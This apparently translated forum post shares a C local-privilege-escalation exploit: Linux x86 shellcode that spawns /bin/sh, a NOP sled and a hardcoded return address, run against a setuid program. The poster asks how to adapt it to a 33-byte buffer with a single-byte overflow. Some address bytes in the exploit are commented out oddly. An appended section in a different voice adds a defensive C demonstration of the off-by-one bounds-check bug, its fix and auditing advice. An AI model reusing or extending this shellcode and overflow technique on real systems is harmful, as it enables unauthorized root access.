I found this exploit and roughly understand it, but there is a problem!
#include <stdio.h>
#include <strings.h>   /* bzero */
#include <unistd.h>    /* execl */

char sc_linux[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";

int main(void)
{
    int i, j;
    char buffer[1024];

    bzero(buffer, 1024);

    /* NOP sled filling the buffer up to where the shellcode starts */
    for (i = 0; i <= (252 - sizeof(sc_linux)); i++)
    {
        buffer[i] = 0x90;
    }

    /* copy the shellcode (without its terminating NUL) right after the sled */
    for (j = 0; j < (sizeof(sc_linux) - 1); i++, j++)
    {
        buffer[i] = sc_linux[j];
    }

    buffer[i++] = 0x74; /*
    buffer[i++] = 0xfc; * Address of our buffer
    buffer[i++] = 0xff; *
    buffer[i++] = 0xbf; */
    buffer[i++] = 0x5c;

    execl("./suid", "suid", buffer, NULL);
    return 0;
}
Now there is a suid program with a single-byte overflow. But its buffer is bounds-checked and very small: 33 bytes.
The overflow happens exactly at the 33rd byte, and anything longer than 33 bytes is rejected. The exploit above clearly needs far too large a buffer! Could someone give me some pointers? Much appreciated~~~~
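The post describes a bounds check that still lets exactly one byte past the buffer be written. As an added example (not code from the post or from the suid program it mentions), the block below shows the classic source of that bug class: a length check written as `len > BUF_SIZE` when the copy also appends a terminator, and the corrected check that reserves room for it. The 32-byte `BUF_SIZE`, the `0xA5` sentinel and the function names are assumptions chosen for illustration; `probe` reports whether the byte just past the logical buffer was touched, which is what a reviewer or fuzzer harness would look for.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE 32     /* assumed size of the buffer the program thinks it owns */
#define SENTINEL 0xA5   /* constructed marker placed just past the buffer */

/* Vulnerable check: "len > BUF_SIZE" rejects only 33+ bytes, so a 32-byte
 * payload is accepted and the terminating NUL lands at dst[32], one byte
 * past the buffer. This is the single-byte overflow pattern. */
static int copy_off_by_one(char *dst, const char *src, size_t len)
{
    if (len > BUF_SIZE)
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';        /* len == BUF_SIZE -> writes dst[BUF_SIZE] */
    return 0;
}

/* Fixed check: reserve one slot for the terminator, so the longest accepted
 * payload is BUF_SIZE-1 bytes and dst[BUF_SIZE-1] is the last byte written. */
static int copy_bounded(char *dst, const char *src, size_t len)
{
    if (len >= BUF_SIZE)
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Run one copy routine against a payload of `len` bytes (constructed, all 'A')
 * and report what happened to the byte immediately past the logical buffer.
 * Storage is BUF_SIZE+1 bytes so that slot is a valid sentinel; the copy
 * routines are only ever told about BUF_SIZE bytes.
 * Returns 1 if the sentinel was clobbered, 0 if intact, -1 if input rejected. */
static int probe(int (*copy)(char *, const char *, size_t), size_t len)
{
    unsigned char storage[BUF_SIZE + 1];
    char payload[64];

    if (len > sizeof payload)
        return -1;
    memset(payload, 'A', sizeof payload);
    memset(storage, SENTINEL, sizeof storage);

    if (copy((char *)storage, payload, len) != 0)
        return -1;
    return storage[BUF_SIZE] != SENTINEL;
}

int main(void)
{
    size_t len;
    for (len = 30; len <= 33; len++) {
        printf("len=%zu  off_by_one=%2d  bounded=%2d\n", len,
               probe(copy_off_by_one, len), probe(copy_bounded, len));
    }
    return 0;
}
```

Run stand-alone, the table shows the vulnerable routine reporting `1` (sentinel clobbered) only at `len == 32`, while the bounded routine never returns `1`: it either fits or refuses the input. Auditing for `<=`/`>` mismatches between a length check and a following `dst[len] = '\0'` is the quickest way to find this class in C code.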